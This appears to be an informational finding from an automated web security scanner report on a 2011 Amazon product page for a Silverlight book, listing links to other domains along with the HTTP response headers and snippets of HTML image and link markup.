<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/WPF-4-Unleashed-Adam-Nathan/dp/0672331195/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0672331195" ><img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="WPF 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/185-0119564-6236271"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.373. http://www.amazon.com/gp/product/0672333368 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0672333368

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:57:56 GMT
Server: Server
x-amz-id-1: 15QXH1NVPGW2NN4XRB7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 9pLftCB/UzAze59wdUxuUJpLHZ30X813v2HmE/UGkV0lc0gEu8B/fJgGoIgRn5xX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-9241494-4669614; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=qysMAEBxIra9ytEnY6tq2qO8Ud5xhwfttcDZbRVhHKzmR5qh7pMZryFMuXrRO3qkAXIboHqWL5bHizeLWsR5l/AIXplutjhn6T93+1UleTUDo9/YfCszgIzBNTya2BpHrjJegeTQEF+1WCdBzrSK12d2Syp9icw4heM5dldSvGmwy+uK4ZqeYDd6sGcxi6bSdeNYr48M4gq64aJup9jidi2PrPt/dUzYGApqqO2e9H64DICuwigDP8/07tUKImEJ8H4a7GMLlOT285/+KoeEoNL7ruPtvAJl9PsFfkE/zgTLPgvqkCc1jL5oOr65MmStzcgcs4sclU86P7hVSTYeApTOsGGTtkRv1SqHK1nNT/zYpFSc82kHXtM1UazevOXzgXOII+PFzXO+PIpwGvVD7XmAX57+u8ytP8HVuhm9c3wLbfTSTYhRsH+IKuwDtRk+yZv5SiUYZ+k=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:57:56 2011 GMT
Content-Length: 402942

<html>
<head>
<script type='text/javascript'>
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="/gp/reader/0672333368/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 Unleashed" onmouseover="" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.<b>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 Unleashed" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Pro Silverlight 4 in C#" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
